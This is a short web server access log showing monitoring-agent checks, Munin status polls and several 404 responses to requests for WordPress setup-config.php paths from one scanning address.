127.0.0.1 - - [15/Jun/2025:19:05:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1451 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:19:05:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1451 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:19:05:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:19:05:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1451 "-" "munin/2.0.73 (libwww-perl/6.67)"
2a06:98c0:3600::103 - - [15/Jun/2025:19:05:14 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.54.118.134 - - [15/Jun/2025:19:05:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [15/Jun/2025:19:05:50 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
2a06:98c0:3600::103 - - [15/Jun/2025:19:06:29 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
127.0.0.1 - - [15/Jun/2025:19:06:30 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.177.126.50 - - [15/Jun/2025:19:06:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:19:06:59 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [15/Jun/2025:19:08:10 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.54.118.134 - - [15/Jun/2025:19:08:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [15/Jun/2025:19:09:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:19:09:59 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:19:10:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41556 "-" "-"
127.0.0.1 - - [15/Jun/2025:19:10:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1447 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [15/Jun/2025:19:10:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1449 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [15/Jun/2025:19:10:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [15/Jun/2025:19:10:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1447 "-" "munin/2.0.73 (libwww-perl/6.67)"
43.159.143.139 - - [15/Jun/2025:19:10:55 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.118.134 - - [15/Jun/2025:19:11:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [15/Jun/2025:19:11:53 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
43.133.59.59 - - [15/Jun/2025:19:12:33 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
198.177.126.50 - - [15/Jun/2025:19:12:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [15/Jun/2025:19:12:59 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
93.174.93.12 - - [15/Jun/2025:19:13:10 +0000] "GET / HTTP/1.0" 200 163 "-" "Mozilla/5.0 (Linux; Android 8.0.0; F5321) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
198.54.118.134 - - [15/Jun/2025:19:14:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
